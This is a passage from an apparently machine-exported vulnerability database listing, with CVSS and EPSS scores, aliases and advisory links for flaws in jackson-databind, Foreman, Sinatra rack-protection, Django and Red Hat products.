url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.4.0:*:*:*:*:*:*:*
31
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0:*:*:*:*:*:*:*
32
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.1:*:*:*:*:*:*:*
33
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
34
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
35
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*
36
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*
37
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*
38
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*
39
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*
40
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-7536
reference_id CVE-2017-7536
reference_type
scores
0
value 4.4
scoring_system cvssv2
scoring_elements AV:L/AC:M/Au:N/C:P/I:P/A:P
1
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-7536
41
reference_url https://github.com/advisories/GHSA-xxgp-pcfc-3vgc
reference_id GHSA-xxgp-pcfc-3vgc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xxgp-pcfc-3vgc
fixed_packages
aliases CVE-2017-7536, GHSA-xxgp-pcfc-3vgc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pd7m-bhqf-kkge
56
url VCID-pnt3-1ssq-tqau
vulnerability_id VCID-pnt3-1ssq-tqau
summary 
Deserialization of untrusted data in Jackson Databind
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms).
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-14061.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-14061.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-14061
reference_id
reference_type
scores
0
value 0.0615
scoring_system epss
scoring_elements 0.90825
published_at 2026-04-13T12:55:00Z
1
value 0.0615
scoring_system epss
scoring_elements 0.90827
published_at 2026-04-12T12:55:00Z
2
value 0.0615
scoring_system epss
scoring_elements 0.90818
published_at 2026-04-09T12:55:00Z
3
value 0.0615
scoring_system epss
scoring_elements 0.90812
published_at 2026-04-08T12:55:00Z
4
value 0.0615
scoring_system epss
scoring_elements 0.90801
published_at 2026-04-07T12:55:00Z
5
value 0.0615
scoring_system epss
scoring_elements 0.9079
published_at 2026-04-04T12:55:00Z
6
value 0.0615
scoring_system epss
scoring_elements 0.90773
published_at 2026-04-01T12:55:00Z
7
value 0.0615
scoring_system epss
scoring_elements 0.90779
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-14061
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14061
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14061
3
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
4
reference_url https://github.com/FasterXML/jackson-databind/commit/5c8642aeae9c756b438ab7637c90ef3c77966e6e
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/5c8642aeae9c756b438ab7637c90ef3c77966e6e
5
reference_url https://github.com/FasterXML/jackson-databind/issues/2698
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-27T20:32:59Z/
url https://github.com/FasterXML/jackson-databind/issues/2698
6
reference_url https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-27T20:32:59Z/
url https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html
7
reference_url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-14061
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-14061
9
reference_url https://security.netapp.com/advisory/ntap-20200702-0003
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20200702-0003
10
reference_url https://security.netapp.com/advisory/ntap-20200702-0003/
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-27T20:32:59Z/
url https://security.netapp.com/advisory/ntap-20200702-0003/
11
reference_url https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316
12
reference_url https://www.oracle.com/security-alerts/cpuApr2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-27T20:32:59Z/
url https://www.oracle.com/security-alerts/cpuApr2021.html
13
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-27T20:32:59Z/
url https://www.oracle.com/security-alerts/cpujan2021.html
14
reference_url https://www.oracle.com//security-alerts/cpujul2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-27T20:32:59Z/
url https://www.oracle.com//security-alerts/cpujul2021.html
15
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-27T20:32:59Z/
url https://www.oracle.com/security-alerts/cpuoct2020.html
16
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-27T20:32:59Z/
url https://www.oracle.com/security-alerts/cpuoct2021.html
17
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1848966
reference_id 1848966
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1848966
18
reference_url https://github.com/advisories/GHSA-c2q3-4qrh-fm48
reference_id GHSA-c2q3-4qrh-fm48
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c2q3-4qrh-fm48
19
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
20
reference_url https://access.redhat.com/errata/RHSA-2020:3196
reference_id RHSA-2020:3196
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3196
21
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
22
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
23
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2020-14061, GHSA-c2q3-4qrh-fm48
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pnt3-1ssq-tqau
57
url VCID-pyr1-73vu-93ej
vulnerability_id VCID-pyr1-73vu-93ej
summary foreman: Persisted XSS on all pages that use breadcrumbs
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-14664.json
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-14664.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-14664
reference_id
reference_type
scores
0
value 0.00291
scoring_system epss
scoring_elements 0.524
published_at 2026-04-01T12:55:00Z
1
value 0.00291
scoring_system epss
scoring_elements 0.52446
published_at 2026-04-02T12:55:00Z
2
value 0.00291
scoring_system epss
scoring_elements 0.52474
published_at 2026-04-04T12:55:00Z
3
value 0.00291
scoring_system epss
scoring_elements 0.52441
published_at 2026-04-07T12:55:00Z
4
value 0.00291
scoring_system epss
scoring_elements 0.52493
published_at 2026-04-08T12:55:00Z
5
value 0.00291
scoring_system epss
scoring_elements 0.52488
published_at 2026-04-09T12:55:00Z
6
value 0.00291
scoring_system epss
scoring_elements 0.52539
published_at 2026-04-11T12:55:00Z
7
value 0.00291
scoring_system epss
scoring_elements 0.52522
published_at 2026-04-12T12:55:00Z
8
value 0.00291
scoring_system epss
scoring_elements 0.52506
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-14664
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1638130
reference_id 1638130
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1638130
fixed_packages
aliases CVE-2018-14664
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pyr1-73vu-93ej
58
url VCID-q4x5-bxn7-5yht
vulnerability_id VCID-q4x5-bxn7-5yht
summary 
Timing attack vulnerability
Sinatra rack-protection contains a timing attack vulnerability in the CSRF token checking that can result in signatures can be exposed. This attack appear to be exploitable via network connectivity to the ruby application.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:1060
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:1060
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1000119.json
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1000119.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-1000119
reference_id
reference_type
scores
0
value 0.00427
scoring_system epss
scoring_elements 0.624
published_at 2026-04-09T12:55:00Z
1
value 0.00427
scoring_system epss
scoring_elements 0.62409
published_at 2026-04-12T12:55:00Z
2
value 0.00427
scoring_system epss
scoring_elements 0.62419
published_at 2026-04-11T12:55:00Z
3
value 0.00427
scoring_system epss
scoring_elements 0.62279
published_at 2026-04-01T12:55:00Z
4
value 0.00427
scoring_system epss
scoring_elements 0.62337
published_at 2026-04-02T12:55:00Z
5
value 0.00427
scoring_system epss
scoring_elements 0.62367
published_at 2026-04-04T12:55:00Z
6
value 0.00427
scoring_system epss
scoring_elements 0.62333
published_at 2026-04-07T12:55:00Z
7
value 0.00427
scoring_system epss
scoring_elements 0.62383
published_at 2026-04-08T12:55:00Z
8
value 0.0043
scoring_system epss
scoring_elements 0.62528
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-1000119
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000119
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000119
4
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack-protection/CVE-2018-1000119.yml
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack-protection/CVE-2018-1000119.yml
5
reference_url https://github.com/sinatra/rack-protection
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/sinatra/rack-protection
6
reference_url https://github.com/sinatra/rack-protection/pull/98
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3
scoring_elements
1
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/sinatra/rack-protection/pull/98
7
reference_url https://github.com/sinatra/sinatra/commit/8aa6c42ef724f93ae309fb7c5668e19ad547eceb#commitcomment-27964109
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/sinatra/sinatra/commit/8aa6c42ef724f93ae309fb7c5668e19ad547eceb#commitcomment-27964109
8
reference_url https://www.debian.org/security/2018/dsa-4247
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2018/dsa-4247
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1534027
reference_id 1534027
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1534027
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-1000119
reference_id CVE-2018-1000119
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-1000119
11
reference_url https://github.com/advisories/GHSA-688c-3x49-6rqj
reference_id GHSA-688c-3x49-6rqj
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-688c-3x49-6rqj
12
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
13
reference_url https://access.redhat.com/errata/RHSA-2021:1313
reference_id RHSA-2021:1313
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1313
fixed_packages
aliases CVE-2018-1000119, GHSA-688c-3x49-6rqj
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-q4x5-bxn7-5yht
59
url VCID-qjez-qe32-e3b6
vulnerability_id VCID-qjez-qe32-e3b6
summary An issue was discovered in Django 1.11 before 1.11.22, 2.1 before 2.1.10, and 2.2 before 2.2.3. An HTTP request is not redirected to HTTPS when the SECURE_PROXY_SSL_HEADER and SECURE_SSL_REDIRECT settings are used, and the proxy connects to Django via HTTPS. In other words, django.http.HttpRequest.scheme has incorrect behavior when a client uses HTTP.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html
1
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12781.json
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12781.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-12781
reference_id
reference_type
scores
0
value 0.03901
scoring_system epss
scoring_elements 0.88249
published_at 2026-04-04T12:55:00Z
1
value 0.03901
scoring_system epss
scoring_elements 0.88282
published_at 2026-04-13T12:55:00Z
2
value 0.03901
scoring_system epss
scoring_elements 0.88291
published_at 2026-04-11T12:55:00Z
3
value 0.03901
scoring_system epss
scoring_elements 0.88279
published_at 2026-04-09T12:55:00Z
4
value 0.03901
scoring_system epss
scoring_elements 0.88273
published_at 2026-04-08T12:55:00Z
5
value 0.03901
scoring_system epss
scoring_elements 0.88254
published_at 2026-04-07T12:55:00Z
6
value 0.03901
scoring_system epss
scoring_elements 0.88226
published_at 2026-04-01T12:55:00Z
7
value 0.03901
scoring_system epss
scoring_elements 0.88234
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-12781
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12308
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12308
5
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12781
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12781
6
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6975
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6975
7
reference_url https://docs.djangoproject.com/en/dev/releases/security
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://docs.djangoproject.com/en/dev/releases/security
8
reference_url https://docs.djangoproject.com/en/dev/releases/security/
reference_id
reference_type
scores
url https://docs.djangoproject.com/en/dev/releases/security/
9
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
10
reference_url https://github.com/advisories/GHSA-6c7v-2f49-8h26
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-6c7v-2f49-8h26
11
reference_url https://github.com/django/django
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/django/django
12
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2019-10.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2019-10.yaml
13
reference_url https://groups.google.com/forum/#!topic/django-announce/Is4kLY9ZcZQ
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!topic/django-announce/Is4kLY9ZcZQ
14
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5VXXWIOQGXOB7JCGJ3CVUW673LDHKEYL
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5VXXWIOQGXOB7JCGJ3CVUW673LDHKEYL
15
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5VXXWIOQGXOB7JCGJ3CVUW673LDHKEYL/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5VXXWIOQGXOB7JCGJ3CVUW673LDHKEYL/
16
reference_url https://seclists.org/bugtraq/2019/Jul/10
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://seclists.org/bugtraq/2019/Jul/10
17
reference_url https://security.netapp.com/advisory/ntap-20190705-0002
reference_id
